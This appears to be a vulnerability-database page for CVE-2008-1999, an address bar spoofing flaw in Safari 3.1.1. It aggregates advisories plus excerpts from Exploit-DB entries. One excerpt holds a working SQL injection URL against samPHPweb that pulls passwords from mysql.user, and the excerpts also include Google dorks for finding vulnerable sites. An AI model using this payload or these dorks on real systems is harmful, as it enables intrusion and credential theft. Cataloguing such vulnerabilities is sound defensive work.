CVE-2008-1999
published 2008-04-28CVE-2008-1999: Apple Safari 3.1.1 allows remote attackers to spoof the address bar by placing many "invisible" characters in the userinfo subcomponent of the authority…
PriorityP420medium5CVSS 2.0
AVNACLAuNCNIPAN
EPSS
1.41%
69.9th percentile
Apple Safari 3.1.1 allows remote attackers to spoof the address bar by placing many "invisible" characters in the userinfo subcomponent of the authority component of the URL (aka the user field), as demonstrated by %E3%80%80 sequences.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | safari | — | — |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:N
vendor_redhat6.8MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
WebKit: address bar spoofing using URLs with spaces
vendor_redhat·2008-04-22·CVSS 5.0
CVE-2008-1999 [MEDIUM] WebKit: address bar spoofing using URLs with spaces
WebKit: address bar spoofing using URLs with spaces
Apple Safari 3.1.1 allows remote attackers to spoof the address bar by placing many "invisible" characters in the userinfo subcomponent of the authority component of the URL (aka the user field), as demonstrated by %E3%80%80 sequences.
Red Hat
gcc: gcc-4.2 may optimize out certain length checks
vendor_redhat·2008-03-30·CVSS 6.8
CVE-2008-1685 [MEDIUM] gcc: gcc-4.2 may optimize out certain length checks
gcc: gcc-4.2 may optimize out certain length checks
gcc 4.2.0 through 4.3.0 in GNU Compiler Collection, when casts are not used, considers the sum of a pointer and an int to be greater than or equal to the pointer, which might lead to removal of length testing code that was intended as a protection mechanism against integer overflow and buffer overflow attacks, and provide no diagnostic message about this removal. NOTE: the vendor has determined that this compiler behavior is correct according to section 6.5.6 of the C99 standard (aka ISO/IEC 9899:1999)
Statement: The Red Hat Product Security is aware of this new gcc behavior and is currently working to determine what impact these changes will have on the source code processed by the compiler. These changes do not affect Red Hat Enterpri
GHSA
GHSA-36m2-mxfm-7fx8: Apple Safari 3
ghsa_unreviewed·2022-05-01
CVE-2008-1999 [MEDIUM] GHSA-36m2-mxfm-7fx8: Apple Safari 3
Apple Safari 3.1.1 allows remote attackers to spoof the address bar by placing many "invisible" characters in the userinfo subcomponent of the authority component of the URL (aka the user field), as demonstrated by %E3%80%80 sequences.
No detection rules found.
Exploit-DB
Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)
exploitdb·2008-04-04
CVE-1999-0209 Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)
Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)
---
____ ____ __ __
/ \ / \ | | | |
----====####/ /\__\##/ /\ \##| |##| |####====----
| | | |__| | | | | |
| | ___ | __ | | | | |
------======######\ \/ /#| |##| |#| |##| |######======------
\____/ |__| |__| \______/
Computer Academic Underground
http://www.caughq.org
Exploit Code
===============/========================================================
Exploit ID: CAU-EX-2008-0001
Release Date: 2008.04.04
Title: ypupdated_exec.rb
Description: Solaris ypupdated Command Execution
Tested: Solaris x86/sparc 10, sparc 9, 8, 2.7
Attributes: Remote, NULL Auth, Elevated Privileges, Metasploit
Exploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0001.txt
Author/Email: I)ruid
===============/====================================
Exploit-DB
samPHPweb 4.2.2 - 'songinfo.php' SQL Injection
exploitdb·2008-01-05
CVE-2008-0187 samPHPweb 4.2.2 - 'songinfo.php' SQL Injection
samPHPweb 4.2.2 - 'songinfo.php' SQL Injection
---
Title:samPHPweb (songinfo.php) Remote SQL Injection
Script:samPHPweb
Download:http://www.spacialaudio.com/download/samPHPweb.zip
Bug:songinfo.php
Author:BackDoor
Dork1:inurl:samPHPweb/playing.php
Dork2:This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions, LLC 1999 - 2004.
Exploit:
www.victim.com/scriptpath/songinfo.php?songid=-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,password,user,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44/**/from/**/mysql.user
# milw0rm.com [2008-01-05]
Exploit-DB
samPHPweb 4.2.2 - 'db.php' Remote File Inclusion
exploitdb·2008-01-04
CVE-2008-0143 samPHPweb 4.2.2 - 'db.php' Remote File Inclusion
samPHPweb 4.2.2 - 'db.php' Remote File Inclusion
---
+______________________________________________By Crackers_Child___________________________________________+
*
*
* [~] Script.......: samPHPweb
* [~] Page.........: http://support.spacialaudio.com/forums/viewforum.php?f=22 & http://www.spacialaudio.com/
* [~] Author.......: Crackers_Child | [email protected] & [email protected]
* [~] Class........: Remote File İnclude Vulnerability
* [~] Dork.........: This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions, LLC 1999 - 2004.
* [~] Dork.........: This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions
* [~] Dork.........: This page was produced using SAM2 (Streaming Audio Manager)
+____________________________________
http://es.geocities.com/jplopezy/pruebasafari3.htmlhttp://secunia.com/advisories/29900http://securityreason.com/securityalert/3833http://www.securityfocus.com/archive/1/491192/100/0/threadedhttp://www.vupen.com/english/advisories/2008/1347https://exchange.xforce.ibmcloud.com/vulnerabilities/41981http://es.geocities.com/jplopezy/pruebasafari3.htmlhttp://secunia.com/advisories/29900http://securityreason.com/securityalert/3833http://www.securityfocus.com/archive/1/491192/100/0/threadedhttp://www.vupen.com/english/advisories/2008/1347https://exchange.xforce.ibmcloud.com/vulnerabilities/41981
2008-04-28
Published